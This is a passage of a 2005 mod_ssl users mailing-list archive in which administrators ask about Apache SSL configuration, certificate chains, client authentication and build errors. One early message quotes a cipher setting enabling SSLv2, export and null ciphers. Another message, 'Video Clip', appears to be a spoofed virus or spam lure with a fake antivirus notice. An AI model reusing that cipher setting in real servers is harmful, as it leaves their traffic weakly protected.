dbm:/exlibris/sfx_ver/sfx_version_3/app/apache/logs/ssl_scache
SSLSessionCacheTimeout  300
SSLMutex  file:/exlibris/sfx_ver/sfx_version_3/app/apache/logs/ssl_mutex




#   General setup for the virtual host
DocumentRoot "/exlibris/sfx_ver/sfx_version_3/app/apache/htdocs"
ServerName localhost:3051
ServerAdmin you@example.com
ErrorLog =
/exlibris/sfx_ver/sfx_version_3/sfxglb3/logs/apache/https_error_log
TransferLog =
/exlibris/sfx_ver/sfx_version_3/sfxglb3/logs/apache/https_access_log

SSLEngine on

SSLCipherSuite =
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL


SSLCertificateFile =
/exlibris/sfx_ver/sfx_version_3/sfxglb3/config/keys/server.crt
#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.

SSLCertificateKeyFile =
/exlibris/sfx_ver/sfx_version_3/sfxglb3/config/keys/server.pem



    SSLOptions +StdEnvVarsQuestion about Configure SSL server on Solaris =
8


    SSLOptions +StdEnvVars



SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0


CustomLog =
/exlibris/sfx_ver/sfx_version_3/app/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

                               =20



After start apache web server by
        apachectl startssl

Port 3051 works fine as a normal http port not a https port. It seems =
that the SSLEngine is not on.

Any input will be appreciate.

Judy





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 31 21:22:25 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 004D414EA9B; Thu, 31 Mar 2005 21:22:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.207])
	by master.modssl.org (Postfix) with ESMTP id 9F59014DD98
	for ; Thu, 31 Mar 2005 21:22:23 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id 69so638413wri
        for ; Thu, 31 Mar 2005 11:22:22 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding;
        b=cAG81oEs1d5VL6sb9Uv2XEkTxG4VlmNgoTn5/cx4Xe5iZ53999g0xBVh22IZpTrT/0t1msDH78WmmkvrEYGpITsUXhHPuyZ5WSBMhZ9MAi0bW7lqwkac+TGyJaN8KBSBrpj54xxGR0u6AN1F5s4IFZ8Kv+mYezFAj3DMdW1Lw0k=
Received: by 10.54.89.14 with SMTP id m14mr186595wrb;
        Thu, 31 Mar 2005 11:22:22 -0800 (PST)
Received: by 10.54.89.8 with HTTP; Thu, 31 Mar 2005 11:22:22 -0800 (PST)
Message-ID: 
Date: Thu, 31 Mar 2005 14:22:22 -0500
From: BJ Swope 
To: modssl-users@modssl.org
Subject: Latest IE and Mozilla Is not Trusting Chain of Certifiers
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BJ Swope 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello All,

I am using modssl 2.8.14 with apache 1.3.27.

I have configured my virtual hosts with the following directive...


SSLCertificateChainFile /conf/apache/certifier.ber


That makes apache push the list of certifiers, in this case a private
CA during the TLS handshake.

When using openssl s_client, I see the certificate and CA properly so
I can tell that the chain is being pushed with the certificate.

The problem is that IE and Mozilla have recently begun warning when a
user connects via HTTPS to a site and the site is using a certificate
that was signed by a CA that is not the browser's list of known
certifiers.

Previously the above mentioned directive would prevent the warning.

Has anybody else seen this behavior and what have you done to work around it?

Thanks,
BJ
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr  4 15:54:41 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CDBBB14EAAB; Mon,  4 Apr 2005 15:54:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mclean-vscan5.bah.com (mclean-vscan5.bah.com [156.80.3.66])
	by master.modssl.org (Postfix) with ESMTP id 57A3214DEBA
	for ; Mon,  4 Apr 2005 15:54:40 +0200 (CEST)
Received: from mclean-vscan5.bah.com (mclean-vscan5.bah.com [156.80.3.66])
	by mclean-vscan5.bah.com (8.11.0/8.11.0) with SMTP id j34Dsdw09870;
	Mon, 4 Apr 2005 09:54:39 -0400 (EDT)
Received: from mclnexbh03.resource.ds.bah.com ([156.80.7.153])
 by mclean-vscan5.bah.com (SAVSMTP 3.1.6.45) with SMTP id M2005040409543810841
 ; Mon, 04 Apr 2005 09:54:38 -0400
Received: from MCLNEXVS07.resource.ds.bah.com ([156.80.7.141]) by mclnexbh03.resource.ds.bah.com with Microsoft SMTPSVC(6.0.3790.211);
	 Mon, 4 Apr 2005 09:54:39 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C5391D.D819527A"
Subject: Client Authentication
Date: Mon, 4 Apr 2005 09:54:38 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Client Authentication
Thread-Index: AcU5HdftKvmMCJonReCJu4NnyKw7JA==
From: "Hoda Nadeem" 
To: , 
X-OriginalArrivalTime: 04 Apr 2005 13:54:39.0465 (UTC) FILETIME=[D83D2D90:01C5391D]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hoda Nadeem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C5391D.D819527A
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

=20
I am working on an SSL interface with smart cards with on board
certificates.=20
=20
I have enabled client authentication in apache through the following
lines:=20
=20
SSLVerifyClient require
SSLVerifyDepth 1
SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key

And, the server definitely requests the client certificate, but I get
the following errors:
=20
[Sun Apr 03 04:02:04 2005] [warn] Init: Oops, you want to request client
authentication, but no CAs are known for verification!?  [Hint:
SSLCACertificate*]
[Sun Apr 03 04:02:04 2005] [warn] RSA server certificate CommonName (CN)
`localhost.localdomain' does NOT match server name!?
[Mon Apr 04 09:07:04 2005] [error] Certificate Verification: Error (20):
unable to get local issuer certificate

The second error is obviously because I have a test certificate on my
server.
=20
Following these errors, the system hangs...stays indefinitely in waiting
state, or goes to 'page cannot be found'
=20
Any help is appreciated.=20
=20
Thanks.=20
=20
Nadeem

------_=_NextPart_001_01C5391D.D819527A
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable







 


I am =
working on an=20
SSL interface with smart cards with on board certificates. =



 


I have =
enabled=20
client authentication in apache through the following lines:=20



 


SSLVerifyClient=20
require
SSLVerifyDepth 1
SSLCertificateFile=20
/etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile=20
/etc/httpd/conf/ssl.key/server.key


And, =
the server=20
definitely requests the client certificate, but I get the following=20
errors:


 


[Sun =
Apr 03 04:02:04=20
2005] [warn] Init: Oops, you want to request client authentication, but =
no CAs=20
are known for verification!?  [Hint: SSLCACertificate*]
[Sun Apr =
03=20
04:02:04 2005] [warn] RSA server certificate CommonName (CN)=20
`localhost.localdomain' does NOT match server name!?
[Mon Apr 04 =
09:07:04=20
2005] [error] Certificate Verification: Error (20): unable to get local =
issuer=20
certificate


The =
second error is=20
obviously because I have a test certificate on my =
server.


 


Following these=20
errors, the system hangs...stays indefinitely in waiting state, or goes =
to 'page=20
cannot be found'


 


Any =
help is=20
appreciated. 


 


Thanks.=20



 


Nadeem


------_=_NextPart_001_01C5391D.D819527A--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr  4 22:59:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 20D0A14EAAD; Mon,  4 Apr 2005 22:59:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vsmtp1.tin.it (vsmtp1.tin.it [212.216.176.141])
	by master.modssl.org (Postfix) with ESMTP id AA78F14EAA2
	for ; Mon,  4 Apr 2005 22:59:56 +0200 (CEST)
Received: from LapoACER1511LMI (213.45.102.58) by vsmtp1.tin.it (7.0.027) (authenticated as lapolapolapo@tin.it)
        id 424C415B001977C8 for modssl-users@modssl.org; Mon, 4 Apr 2005 22:59:53 +0200
Message-ID: <00f901c53959$3f915990$0201a8c0@LapoACER1511LMI>
From: "Lapo TIN" 
To: 
Subject: server Apache + modssl and USBtokens
Date: Mon, 4 Apr 2005 22:59:52 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00F6_01C5396A.029E42D0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2527
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lapo TIN" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00F6_01C5396A.029E42D0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello to everybody.
My intent is to let Apache (+ modsll ) server  that uses an USB token =
for SSL=20
protocol.
I know it's not possible to have good performances with tokens , but I =
don't=20
care.

I would like that the server uses the private key that is securely =
stored in=20
the token.
And according to the fact that a token cannot allow any method for =
reading=20
that private key, I'm trying to find the best server that can use =
crypting=20
function of a token. What do you think ?

The question is:
- is there some stuff that already do that ? usb token that provide =
library=20
or server ready for that purpose..

thanks in advance=20
Lapo

------=_NextPart_000_00F6_01C5396A.029E42D0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello to everybody.
My intent is to let Apache (+ modsll ) =
server =20
that uses an USB token for SSL 
protocol.
I know it's not possible =
to have=20
good performances with tokens , but I don't 
care.

I would =
like that=20
the server uses the private key that is securely stored in 
the =
token.
And=20
according to the fact that a token cannot allow any method for reading =

that=20
private key, I'm trying to find the best server that can use crypting=20

function of a token. What do you think ?

The question =
is:
- is=20
there some stuff that already do that ? usb token that provide library =

or=20
server ready for that purpose..

thanks in advance 


Lapo


------=_NextPart_000_00F6_01C5396A.029E42D0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  6 06:54:14 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D74D414EA9F; Wed,  6 Apr 2005 06:54:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.30.6.168 (CPE0004764da6d1-CM014340029021.cpe.net.cable.rogers.com [24.103.74.128])
	by master.modssl.org (Postfix) with SMTP id E877014EA91
	for ; Wed,  6 Apr 2005 06:54:11 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: Video Clip
Date: 06 Apr 2005 01:54:08 -0400
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20050406045411.E877014EA91@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Here is another Vclip of my daily group :|
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  6 17:23:21 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E2D3A14EA9F; Wed,  6 Apr 2005 17:23:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rduex02.corp.stratech.com (outmail.stratech.com [216.26.242.2])
	by master.modssl.org (Postfix) with ESMTP id 75A1714EA91
	for ; Wed,  6 Apr 2005 17:23:18 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: Openssl installation.
Date: Wed, 6 Apr 2005 11:23:16 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Openssl installation.
thread-index: AcU6vI4uf17NtJ7gTZ2ignPWWBOL2w==
From: "Plantier, Spencer" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Plantier, Spencer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I am new to Apache and Solaris. I am using Solaris 9 with apache 2.0.53
and openssl .0.9.7f. I am trying to get openssl working with Apache. I
have tried to compile openssl by doing the following:
../config
make
make build-shared
mv libssl.so* /usr/local/lib
mv libcrypto.so* /usr/local/lib

And I still get the following error:

Syntax error on line 251 of /usr/local/apache2/conf/httpd.conf:
Cannot load /usr/local/apache2/modules/mod_ssl.so into server: ld.so.1:
/usr/local/apache2/bin/httpd: fatal: relocation error: file
/usr/local/apache2/modules/mod_ssl.so: symbol X509_INFO_free: referenced
symbol not found

Any help would be appreciated

Spencer Plantier
System Network Administrator
=20
301 Gregson Dr
Cary, NC  27511
Office 919-379-8513
Cell    919-272-8833
spencer.plantier@stratech.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 12 16:52:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6B03D14EAB8; Tue, 12 Apr 2005 16:52:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alwebwiz.com (alwebwiz.com [64.59.83.96])
	by master.modssl.org (Postfix) with ESMTP id E774B14DCA1
	for ; Tue, 12 Apr 2005 16:52:29 +0200 (CEST)
Received: from [192.168.0.2] (82-41-15-28.cable.ubr02.edin.blueyonder.co.uk [82.41.15.28])
	by alwebwiz.com (8.11.6/8.11.6) with ESMTP id j3CEqSF12318
	for ; Tue, 12 Apr 2005 10:52:29 -0400
Mime-Version: 1.0 (Apple Message framework v619.2)
Content-Transfer-Encoding: 7bit
Message-Id: <006d7c82d146484a5aa0ba95323f1770@alwebwiz.net>
Content-Type: text/plain; charset=US-ASCII; format=flowed
To: modssl-users@modssl.org
From: Alan Boyd 
Subject: Generating secret for digest authentication...
Date: Tue, 12 Apr 2005 15:52:21 +0100
X-Mailer: Apple Mail (2.619.2)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alan Boyd 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I seem to be having a bit of a problem with my apache/mod_ssl 
installation and am hoping someone can help.
Starting up apache (with apachectl) causes no creation of pid file.  
Although *something* on my server starts listening to connections on 
port 80, it does not respond and no data is actually served.

Looking in my error_log with debug turned on, I get the following 
information:

[Tue Apr 12 10:33:39 2005] [info] Init: Initializing OpenSSL library
[Tue Apr 12 10:33:39 2005] [info] Init: Seeding PRNG with 0 bytes of 
entropy
[Tue Apr 12 10:33:39 2005] [info] Loading certificate & private key of 
SSL-aware server
[Tue Apr 12 10:33:39 2005] [debug] ssl_engine_pphrase.c(469): 
unencrypted RSA private key - pass phrase not required
[Tue Apr 12 10:33:39 2005] [info] Init: Generating temporary RSA 
private keys (512/1024 bits)
[Tue Apr 12 10:33:39 2005] [info] Init: Generating temporary DH 
parameters (512/1024 bits)
[Tue Apr 12 10:33:39 2005] [warn] Init: Session Cache is not configured 
[hint: SSLSessionCache]
[Tue Apr 12 10:33:39 2005] [info] Init: Initializing (virtual) servers 
for SSL
[Tue Apr 12 10:33:39 2005] [info] Configuring server for SSL protocol
[Tue Apr 12 10:33:39 2005] [debug] ssl_engine_init.c(405): Creating new 
SSL context (protocols: SSLv2, SSLv3, TLSv1)
[Tue Apr 12 10:33:39 2005] [debug] ssl_engine_init.c(716): Configuring 
RSA server certificate
[Tue Apr 12 10:33:39 2005] [debug] ssl_engine_init.c(755): Configuring 
RSA server private key
[Tue Apr 12 10:33:39 2005] [info] Server: Apache/2.0.53, Interface: 
mod_ssl/2.0.53, Library: OpenSSL/0.9.7g
[Tue Apr 12 10:33:39 2005] [notice] Digest: generating secret for 
digest authentication ...

Where apache seems to simply stop.

I've googled around, but haven't been able to find any suggestions as 
to how this might be fixed (although I have seen it reported on one 
forum).

Running redhat 9.

Any ideas?

Cheers!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 13 23:41:33 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 875B314EAB8; Wed, 13 Apr 2005 23:41:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 0BFE914DD98
	for ; Wed, 13 Apr 2005 23:41:32 +0200 (CEST)
Received: from dziban.ligo.caltech.edu (dziban [131.215.115.46])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id j3DLewY3011568
	for ; Wed, 13 Apr 2005 14:40:59 -0700 (PDT)
Received: (from pehrens@localhost)
	by dziban.ligo.caltech.edu (8.12.10+Sun/8.12.6/Submit) id j3DLfVpS025517
	for modssl-users@modssl.org; Wed, 13 Apr 2005 14:41:31 -0700 (PDT)
Date: Wed, 13 Apr 2005 14:41:30 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: using proxy certs for client authorization
Message-ID: <20050413214130.GC25494@ligo.caltech.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.7i
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 1272044 - d222d0414e9e
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

I started working with the Apache-2.0.X SSL module a
couple of weeks ago, and have been able to set up
client certificate auth without *too* much blood,
sweat, and tears.

However, my users are expecting a client proxy
certificate issued for use by another software
suite to be usable with Apache. The proxy certs
are signed by the users client certificate, and
Apache is configured to accept the client cert,
but convincing Apache to accept the *proxy*
certificate is another story. I expect that I
need to collect the client certificates of all
the users and register them for use by mod_ssl,
but I am not sure how. There must be some way
of establishing a "chain" of authority.

Does this sound familiar to anybody here?

Phil
-- 
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.yellow5.com
1200 East California Blvd.            | http://www.total.net/~fishnet/
Pasadena, CA 91125 USA                | http://slashdot.org
Phone:(626)395-8518 Fax:(626)793-9744 | http://kame56.homepage.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 14 13:20:40 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DDBA414EAB8; Thu, 14 Apr 2005 13:20:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp809.mail.ukl.yahoo.com (smtp809.mail.ukl.yahoo.com [217.12.12.199])
	by master.modssl.org (Postfix) with SMTP id A0CE714DCB8
	for ; Thu, 14 Apr 2005 13:20:40 +0200 (CEST)
Received: from unknown (HELO ?192.168.1.2?) (modssl-users@modssl.org@81.153.216.56 with poptime)
  by smtp809.mail.ukl.yahoo.com with SMTP; 14 Apr 2005 11:20:39 -0000
User-Agent: Microsoft-Entourage/10.1.4.030702.0
Date: Thu, 14 Apr 2005 12:20:37 +0100
Subject: VirtualHosts and ServerName
From: Sean 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am working in conjunction with a friend attempting to set up a webserver
to serve a MySQL database both on an intranet and externally over the
internet.  He has created the site using MySQL 4 and PHP 4 and left the
Apache configuration to me.  I wanted to make the connection secure so I
worked through the article here
http://developer.apple.com/internet/serverside/modssl.html

The first problem is that whilst I can get the site to serve fine on the
intranet by typing in the IP address of the webserver eg. 192.1.* in a
browser I can't establish an external connection.  If on the webserver I
type 127.0.0.1 into the browser I get redirected to my router which suggests
to me that an external request should take the internet user to the router
where port forwarding will then take over and redirect the request to the
site and that should then work or am I missing something?  My friend who did
the site has created a config switcher in the config.inc.php file where in
case 1 the host is 'localhost' and the relative path is the 192.168......
address of the machine for the intranet and in case 2 the host is
'localhost' and the relative path is '111.22.345.67 - the external IP' for
the internet access, is it possible that this is causing some kind of loop
whereby requests to Apache are sent to PHP which then refers back to the
router because that is where the external IP address points and if so how do
I get round it?

Secondly, I did have a secure connection being established over the intranet
but now I can't seem to even get that any more it just connects via http and
not https.  I am sure that the problem is to do with the server name and how
the VirtualHosts are configured.  I have tried working through the Apache
documentation, various books and how-tos on the web and am getting very
confused.  I used the notes here
http://peter.nyc.ny.us/docs/macosx.html#hostnames to input the details of my
domain minus the www prefix using the NetInfo Manager option so presumably
that is ok.  Should the server name be the internal or external IP address
of the machine and is it possible to construct both a secure internal and
external network on a machine with only one ethernet interface accessing a
single site?  Any pointers would be helpful.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 15 06:57:21 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
